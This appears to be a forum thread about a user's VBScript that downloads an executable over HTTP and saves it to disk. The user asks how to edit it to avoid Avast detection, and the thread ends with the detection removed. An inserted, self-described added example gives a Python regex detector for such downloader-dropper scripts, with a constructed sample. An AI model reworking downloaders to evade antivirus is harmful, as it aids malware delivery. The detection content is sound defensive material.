[Resolved] VBS script detection

Hello,

I am using a VBS script which downloads a file using HTTP and saves it to a defined folder.

Code:

    strFileURL = "http://dl.dropbox.com/u/1234567/folder/tools.exe"
    strHDLocation = "C:\tools\tools.exe"

    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

    objXMLHTTP.open "GET", strFileURL, false
    objXMLHTTP.send()

    If objXMLHTTP.Status = 200 Then
      Set objADOStream = CreateObject("ADODB.Stream")
      objADOStream.Open
      objADOStream.Type = 1 'adTypeBinary

      objADOStream.Write objXMLHTTP.ResponseBody
      objADOStream.Position = 0    'Set the stream position to the start

      Set objFSO = CreateObject("Scripting.FileSystemObject")
      If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
      Set objFSO = Nothing

      objADOStream.SaveToFile strHDLocation
      objADOStream.Close
      Set objADOStream = Nothing
    End If

    Set objXMLHTTP = Nothing

It is currently detected by Avast and 3 other not-so-popular AV programs.

Jotti detection rate:
http://virusscan.jotti.org/en/scanresult/5e6d67b3750bd8a4f0377f7b72d82d8d355239e5

Could you please advise me how to edit the code to make it more friendly to avast? To prevent the detection?

I have already attempted to submit it as a false via Avast interface however it was not fixed after 2 avi updates, so most likely detection is considered correct.
I am using VBS and not wget due to VBS being available on all Win platforms.

Thank you for your assistance.

It is only detected by two engines, as GData is using avast as one of its two engines and Emsisoft is using the Ikarus virus engine.

Thank you for the additional information.
Anything I can do about the detection?

You can upload a sample and report it as a false positive here:

http://www.avast.com/contacts.
click the “General contact” button / then change subject to the one related to your case

or put it in a password protected zip file and send to avast lab. virus @ avast.com
mail subject: false positive
zip password: infected

Naturally, avast! would detect. There are some key reasons for this.

1. The file is probably for personal use and therefore new to the signatures of avast
2. The VBS file downloads data (an executable) from a specific URL and saves it in the C:\ drive

I can think of several ways to use this in a malicious way.

It’s somehow against Avast’s “Policies”.
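The behaviour described in the reply above (a script that fetches an executable over HTTP and writes it to disk) is the kind of pattern a static heuristic keys on. The following is an added example, not part of the thread and not avast's actual detection logic: a Python triage check for that pattern, in which the indicator list, the function names and both sample scripts are constructed for illustration.

```python
import re

# VBScript identifiers are case-insensitive, so every pattern uses re.I.
PROGID = r'CreateObject\s*\(\s*"(?:%s)[^"]*"'
INDICATORS = {
    "http_client": re.compile(
        PROGID % r"MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "binary_stream": re.compile(PROGID % r"ADODB\.Stream", re.I),
    "response_body": re.compile(r"\.ResponseBody\b", re.I),
    "save_to_file": re.compile(r"\.SaveToFile\b", re.I),
    "executable_name": re.compile(r'"[^"\r\n]*\.(?:exe|dll|scr|msi)"', re.I),
}
# All four must be present for the "fetch bytes, write them to disk" chain.
CHAIN = {"http_client", "binary_stream", "response_body", "save_to_file"}

def strip_comments(source):
    """Remove VBScript comments (' or Rem) that sit outside string literals."""
    cleaned = []
    for line in source.splitlines():
        in_string = False
        for i, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string   # "" inside a string toggles twice
            elif ch == "'" and not in_string:
                line = line[:i]
                break
        cleaned.append("" if re.match(r"\s*rem(\s|$)", line, re.I) else line)
    return "\n".join(cleaned)

def triage(source):
    """Return (verdict, sorted indicator names) for one script's text."""
    code = strip_comments(source)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(code))
    if not CHAIN <= set(hits):
        return "no-match", hits
    return ("downloader-dropper" if "executable_name" in hits else "downloader"), hits

# Constructed sample: same shape as the script posted in this thread.
SAMPLE_DROPPER = r"""Set h = CreateObject("MSXML2.XMLHTTP")
h.open "GET", "http://example.invalid/tools.exe", False
h.send
Set s = CreateObject("ADODB.Stream")
s.Open : s.Type = 1
s.Write h.ResponseBody
s.SaveToFile "C:\tools\tools.exe"
"""
# Constructed sample: mentions the same objects only inside a comment.
SAMPLE_BENIGN = r"""' Old note: this used ADODB.Stream and .SaveToFile once
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists("C:\tools\tools.exe") Then WScript.Echo "present"
"""
```

A check like this matches on behaviour rather than on intent, which is why a personal administrative script and a malicious dropper of the same shape get the same verdict until a vendor reviews the sample.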

VBS script is not detected with latest Avast avi update.

Not sure about the rules on these forums but this thread can be considered resolved/closed.

The topics aren’t closed as such.

You can use the Modify button in your First post in this topic and add [Resolved] to the topic’s Title.